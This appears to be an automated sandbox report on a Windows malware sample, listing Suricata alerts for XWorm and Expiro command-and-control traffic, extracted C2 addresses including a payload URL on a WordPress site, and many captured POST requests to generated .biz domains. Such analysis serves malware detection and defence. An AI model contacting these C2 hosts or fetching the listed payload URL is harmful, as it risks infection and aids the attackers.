Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49727 -> 62.60.190.120:7923
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49800 -> 18.246.231.120:80
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49727 -> 62.60.190.120:7923
Source: Network traffic	Suricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.8:50711 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.8:58390 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.8:57993 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.8:61989 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:50171 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.8:55730 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.8:62117 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.8:50355 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:60253 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.8:57471 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:60791 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:49846 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:56268 -> 82.112.184.197:80
Source: Network traffic	Suricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.8:57634 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49727 -> 62.60.190.120:7923
Source: Network traffic	Suricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.8:60684 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:53706 -> 1.1.1.1:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 62.60.190.120
Source: Malware configuration extractor	URLs: https://chichometextiles.com/wp-admin/233_Jwsmvmdweya

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Connects to many different domains

Source: unknown

Network traffic detected: DNS query count 129

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B0E4B8 InternetCheckConnectionA,

4_2_02B0E4B8

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.8:49727 -> 62.60.190.120:7923

Executes massive DNS lookups (> 100)

Source: global traffic

DNS traffic detected: number of DNS queries: 129

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.8:49711
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.8:49708
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.8:49708
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.8:49731
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.8:49731
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.8:49711
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.8:49790
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.8:49790
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.8:49749
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.8:49752
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.8:49771
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.8:49771
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.8:49802
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.8:49802
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.8:49779
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.8:49779
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.8:49745
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.8:49745
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.8:49785
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.8:49785
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.8:49752
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.8:49749
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.8:49753
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.8:49753
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49716
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49776

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /wp-admin/233_Jwsmvmdweya HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: chichometextiles.com
Source: global traffic	HTTP traffic detected: POST /xvpanbchxym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /iwwaryskplxdjo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ludmpidgkyjmk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pywymqfnuombtvtm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /luqhjxxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fnl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /uqcynitxoaix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rlj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rwebgnmbtiq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hmsaqgigfaxqle HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gcpevfxhbnb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /tpnpycqre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /idnuv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ifmujtvaxdtknray HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qrcvkhcipj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /lurykvmwmoqvfvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rnsuojk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /shc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vhkhfdko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xnnwo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /iobhvfdyhggtu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /mbh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /sjajebqyfvuqndq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /dujlogesynfu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qautyxiqxdcgavi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vdvikkmvoibst HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /go HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bvawourmbxmjmarr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /uquynocac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /igs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /okedkgjfoq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wfcpepuolxclud HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mwes HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /im HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xhqdokiwwp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /na HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /koph HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
